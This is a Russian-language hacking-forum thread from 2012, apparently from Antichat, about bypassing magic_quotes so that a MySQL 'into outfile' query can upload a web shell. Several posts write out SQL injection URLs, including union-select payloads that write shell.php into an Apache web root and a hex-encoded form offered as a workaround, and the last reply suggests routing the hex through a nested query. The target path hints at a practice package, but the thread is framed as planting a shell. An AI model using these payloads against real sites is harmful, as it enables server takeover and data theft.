Как обойти magic_quotes в outfile mysql?

MrHunter · 27 Mar 2012

Всем привет. Столкнулся с такой проблемой. Хочу залить шелл, но на сайте включен magic_quotes. То есть выполнить такой запрос я не могу
http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0X3C707
,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'
Кто знает как решить проблему?

Expl0ited · 27 Mar 2012

Никак.

OxoTnik · 27 Mar 2012

твой запрос

http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0X3C707
,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'
Click to expand...

в него встраиваем внутренний запрос

-1 union select 0X3C707
,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'
Click to expand...

только в хексе

0x2d3120756e696f6e2073656c6563742030583343373037202c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466696c6520277573722f6c6f63616c2f6170616368652f6874646f63732f7765626578706c6f69746174696f6e5f7061636b6167655f30322f20637970686f722f7368656c6c2e706870
Click to expand...

и должно быть что то вроде
http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x2d3120756e696f6e2073656c6563742030583343373037202c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466696c6520277573722f6c6f63616c2f6170616368652f6874646f63732f7765626578706c6f69746174696f6e5f7061636b6167655f30322f20637970686f722f7368656c6c2e706870,null,null,null--

Вроде так можно

Expl0ited · 27 Mar 2012

Аннет, всётаки так нельзя, вложенный запрос не обработается, т.к. это не предусмотрено исполняемым скриптом, если опираться на первый пост.

OxoTnik · 27 Mar 2012

Expl0ited это из-за хекса нельзя, который у него в первом посте? или изза "null"?

MrHunter · 27 Mar 2012

OxoTnik said:

твой запрос

в него встраиваем внутренний запрос

только в хексе

и должно быть что то вроде
http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x2d3120756e696f6e2073656c6563742030583343373037202c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466696c6520277573722f6c6f63616c2f6170616368652f6874646f63732f7765626578706c6f69746174696f6e5f7061636b6167655f30322f20637970686f722f7368656c6c2e706870,null,null,null--

Вроде так можно
Click to expand...

OxoTnik,не выходит. Когда делаю внутренний запрос (в хекс), то он воспринимается как строка, а не как запрос. Искал возможность через сохраненные процедуры, но тоже решения пока не нашел. Есть ли другие предложения?

Ereee · 28 Mar 2012

OxoTnik said:

Expl0ited это из-за хекса нельзя, который у него в первом посте? или изза "null"?
Click to expand...

Путь юзать в хексе нельзя.

TC, ответ дали же. НИКАК.

Pirotexnik · 13 Apr 2012

Можно обойти, при условие, что запрос передается через переменную в другой запрос.

Точда кодируем в хекс и во втором запросе кавычки выполнятся нормально

Как обойти magic_quotes в outfile mysql?

MrHunter New Member

Expl0ited Members of Antichat

OxoTnik На мышей

Expl0ited Members of Antichat

OxoTnik На мышей

MrHunter New Member

Ereee Elder - Старейшина

Pirotexnik Member

Обойти принудительную конкатенацию расширения

Useful Searches

Как обойти magic_quotes в outfile mysql?

MrHunter New Member

Expl0ited Members of Antichat

OxoTnik На мышей

Expl0ited Members of Antichat

OxoTnik На мышей

MrHunter New Member

Ereee Elder - Старейшина

Pirotexnik Member

Обойти принудительную конкатенацию расширения